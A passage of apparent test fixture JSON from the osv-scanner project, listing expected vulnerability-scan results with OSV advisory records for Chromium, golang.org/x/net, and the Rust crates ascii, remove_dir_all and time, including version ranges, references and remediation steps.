"https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ], "urgency": "low" } }, { "package": { "ecosystem": "Go", "name": 
"golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "aliases": null, "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "aliases": null, "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. 
Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may 
segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ] } ================================================ FILE: pkg/osvscanner/testdata/filter/some/want.json ================================================ { "results": [ { "source": { "path": 
"testdata/filter/some/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "chromium", "version": "73.0.3683.75-1", "ecosystem": "Debian:10" }, "vulnerabilities": [ { "modified": "2024-05-03T03:16:29Z", "published": "2024-04-17T08:15:10Z", "id": "CVE-2024-3847", "details": "Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)", "affected": [ { "package": { "ecosystem": "Debian:10", "name": "chromium" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } }, { "package": { "ecosystem": "Debian:11", "name": "chromium" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } } ], "references": [ { "type": "ARTICLE", "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_16.html" }, { "type": "WEB", "url": "https://issues.chromium.org/issues/328690293" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CWIVXXSVO5VB3NAZVFJ7CWVBN6W2735T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IDLUD644WEWGOFKMZWC2K7Z4CQOKQYR7/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4PCXKCOVBUUU6GOSN46DCPI4HMER3PJ/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PCWPUBGTBNT4EW32YNZMRIPB3Y4R6XL6/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOC3HLIZCGMIJLJ6LME5UWUUIFLXEGRN/" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEP5NJUWMDRLDQUKU4LFDUHF5PCYAPIO/" } ] } ], "groups": [ { "ids": [ "CVE-2024-3847" ], "aliases": null, "max_severity": "" } ] } ] }, { "source": { "path": "testdata/filter/some/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "vulnerabilities": [ { "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "schema_version": "1.4.0", "id": 
"GO-2023-1571", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ], "urgency": "low" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "schema_version": "1.4.0", "id": 
"GHSA-mrrw-grhq-86gf", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. 
This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
